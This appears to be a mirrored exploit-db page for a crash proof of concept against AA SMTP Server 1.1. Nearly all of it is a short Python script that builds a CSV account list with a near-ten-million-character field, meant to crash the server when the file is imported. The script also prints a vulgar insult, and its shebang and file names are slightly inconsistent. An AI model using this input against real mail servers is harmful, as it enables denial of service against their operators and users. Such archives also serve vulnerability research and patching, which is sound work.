AA SMTP Server 1.1 – Crash (PoC)

  • 作者: SONIC
    日期: 2010-09-13
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/14990/
  • =========================
    AA SMTP SERVER v.1.1 -- Crash POC
    =========================
    
    Application : AA SMTP SERVER v.1.1
    Vendor URL : http://www.aa2soft.com/download.htm
    Category : Windows/POC/Crash
    #######################################################################################################
    
    
    Author : ..::[ SONiC ]::.. aka ~the_M4LW4r3~ <sonicdefence[at]gmail.com>
    
    Special thanks to : *Ashwin Vamshi*,*Sid3^effects*,*r0073r (inj3ct0r.com)*,*L0rd CruSad3r*,M4n0j,*MA1201[Team iNfection]*,D3aDF0x,Nishi,Bunny,CURS3D,SeeME 
    and All INDIAN Frnds & iNj3ct0r Crew
    
    Greetz to : iNj3cT0r.com, www.andhrahackers.com
    
    #######################################################################################################
    
    
    Description : 
    AA SMTP Server is a light-weighted SMTP server software to run SMTP service for you. You can send mails to recipients directly or indirectly (via ISP relay sending) at high speed. AA SMTP Server supports can also work smoothly together with your existing mail server.
    
    ###############################################################################################################
    
    Exploit:
    
    #!usr/bin/python
    
    print("To all guyswho showing attitude ---poda thevidiya paiya")
    exp = open("c:\\init.csv","a")
    junk = "A"*9999999
    pre = '''"qwertyuiop'''
    after = '''@me.com", 	"qwertyuiop", 	""
    "1",'''
    exp.write(pre+junk+after)
    exp.close()
    print ("import this accountlist.csv from your Server")
    
    ###############################################################################################################
    
    # ..::[ SONiC ]::.. aka the_M4LW4R3
    
    
    # Inj3ct0r.com [2010-08-12]